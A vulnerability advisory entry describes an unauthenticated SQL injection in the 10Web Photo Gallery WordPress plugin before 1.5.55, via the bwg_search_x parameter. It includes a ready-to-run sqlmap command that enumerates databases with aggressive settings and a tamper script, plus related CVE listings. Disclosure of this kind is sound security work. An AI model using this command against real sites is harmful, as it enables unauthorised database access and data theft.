Lucene search
Nguyen Anh TienWPEX-ID:2E33088E-7B93-44AF-AA6A-E5D924F86E28HistoryMay 15, 2020 - 12:00 a.m.
Photo Gallery by 10Web < 1.5.55 - Unauthenticated SQL Injection
2020-05-1500:00:00
Nguyen Anh Tien
395
SQL injection in the Photo Gallery (10Web Photo Gallery) plugin before 1.5.55 exists via the frontend/models/model.php bwg_search_x parameter. Impact All gallery_type is affected by this bug and any unauthenticated remote attacker can exploit the plugin.
Sqlmap payload:
sqlmap -u 'http://example.com/?p=19&bwg_search_0=*' --dbs --risk 3 --level 5 --threads 10 --tamper=space2comment -p bwg_search_0 -f
Video: https://drive.google.com/file/d/1W93XUz5qvWjB27Rn-9L9bIwpBXa2OFNJ/view?usp=sharing
Backup link: https://mega.nz/file/S8UxyYpY#p-QLIwouqWq9Q4OV34KNZ8Zo2a7IAKjXVYJ9HZuh2Yk
Related
cvelist
cvelist
Photo Gallery by 10Web < 1.5.55 - Unauthenticated SQL Injection
2021-03-18 14:57:49
wpvulndb
wpvulndb
Photo Gallery by 10Web < 1.5.55 - Unauthenticated SQL Injection
2020-05-15 00:00:00
prion
prion
Sql injection
2021-03-18 15:15:00
openvas
openvas
WordPress Photo Gallery Plugin < 1.5.55 SQLi Vulnerability
2021-03-24 00:00:00
cve
cve
CVE-2021-24139
2021-03-18 15:15:00
Related for WPEX-ID:2E33088E-7B93-44AF-AA6A-E5D924F86E28